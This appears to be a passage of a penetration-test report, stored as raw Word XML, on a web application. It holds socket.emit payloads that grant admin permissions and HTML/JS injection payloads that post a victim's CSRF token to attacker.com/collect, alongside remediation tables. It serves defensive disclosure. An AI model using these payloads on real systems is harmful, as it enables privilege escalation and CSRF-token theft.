        <w:br/>
        <w:t>socket.emit('permissions:update_perm_cache', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  permissions: ['tf_permissions.tf_admin',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'tf_permissions.tf_manage_users',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'tf_permissions.tf_impersonate_users']</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Set is_admin via config update:</w:t>
        <w:br/>
        <w:t>socket.emit('user:updateuserconfiguration', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  is_admin: [null, true]</w:t>
        <w:br/>
        <w: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Permission updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server validates admin authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Client blindly applies data.permissions via new Set()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User config updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Whitelist of modifiable attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>for..in iterates ALL keys without restriction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Subscription updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server-side billing validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Object.assign merges all received data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.5)</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Server-side: only emit permissions:update_perm_cache from authenticated admin sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Short-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Whitelist modifiable attributes in updateUserConfigs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</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Add integrity checking to subscription config updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-269 — https://cwe.mitre.org/data/definitions/269.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-20: Improper Input Validation — https://cwe.mitre.org/data/definitions/20.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-015: Form Data Exfiltration and CSRF Token Theft via CSP form-action Wildcard Combined with HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CVSS 3.1 Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.8 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CWE-1021 (Improper Restriction), CWE-79 (XSS), CWE-352 (CSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A03:2021 — Injection, A05:2021 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Affected Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP form-action directive + channels/views.js, views/header.js, notifications/views.js, views/credeon_password.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Affected Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Form submission policy + error message rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="e8e8e8" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6480"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Confirmed (reverified June 11, 2026)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This chain combines CSP form-action 'self' * (VULN-006) with multiple HTML injection points via unescaped error messages (VULN-010). An attacker can inject a form that submits the victim's CSRF token and sensitive data to an attacker-controlled server. This works even without JavaScript execution — pure HTML injection is sufficient because form-action * allows cross-origin form submissions. The stolen CSRF token enables the attacker to perform any state-changing operation as the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Component 1 — CSP: form-action 'self' *</w:t>
        <w:br/>
        <w:t>Component 2 — HTML injection in channels/views.js:1638:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  searchInfo.append('&lt;span class="error"&gt;' + error + '&lt;/span&gt;');</w:t>
        <w:br/>
        <w:t>Component 3 — CSRF token in global scope: djangoVars.csrfToken</w:t>
        <w:br/>
        <w:br/>
        <w:t>The chain works with pure HTML (no JS needed) because form-action * allows cross-origin form submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>See HTTP Evidence and PoC sections below for full reproduction details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Pure HTML exploitation (no JS required): --&gt;</w:t>
        <w:br/>
        <w:t>&lt;/span&gt;&lt;form action="https://attacker.com/collect" method="POST"&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="submit"&gt;Session expired. Click to re-authenticate.&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;&lt;span class="error"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- With JS (unsafe-inline allows it): --&gt;</w:t>
        <w:br/>
        <w:t>&lt;/span&gt;&lt;form action="https://attacker.com/collect" method="POST" id="exfil"&gt;</w:t>
        <w:br/>
        <w:t>&lt;input name="csrf" type="hidden"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t>var f = document.getElementById('exfil');</w:t>
        <w:br/>
        <w:t>f.csrf.value = djangoVars.csrfToken;</w:t>
        <w:br/>
        <w:t>f.submit();</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;&lt;span class="error"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Pure HTML exploitation (no JS required): --&gt;</w:t>
        <w:br/>
        <w:t>&lt;/span&gt;&lt;form action="https://attacker.com/collect" method="POST"&gt;</w:t>
        <w:br/>
        <w:t>&lt;button type="submit"&gt;Session expired. Click to re-authenticate.&lt;/button&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;&lt;span class="error"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- With JS (unsafe-inline allows it): --&gt;</w:t>
        <w:br/>
        <w:t>&lt;/span&gt;&lt;form action="https://attacker.com/collect" method="POST" id="exfil"&gt;</w:t>
        <w:br/>
        <w:t>&lt;input name="csrf" type="hidden"&gt;</w:t>
        <w:br/>
        <w:t>&lt;/form&gt;</w:t>
        <w:br/>
        <w:t>&lt;script&gt;</w:t>
        <w:br/>
        <w:t>var f = document.getElementById('exfil');</w:t>
        <w:br/>
        <w:t>f.csrf.value = djangoVars.csrfToken;</w:t>
        <w:br/>
        <w:t>f.submit();</w:t>
        <w:br/>
        <w:t>&lt;/script&gt;&lt;span class="error"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Expected vs. Actual Behavior</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1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Expected Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Actual Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>form-action directive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>form-action 'self' (same-origin only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>form-action 'self' * (any domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Error rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTML-encoded before insertion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw HTML in .append()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Combined effect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Injected forms cannot exfiltrate cross-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Forms freely submit CSRF tokens to attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Status: Confirmed — reverified June 11, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation Recommendations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a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Change form-action 'self' * to form-action 'self'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Escape error messages: utils.escapeHTML(error)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
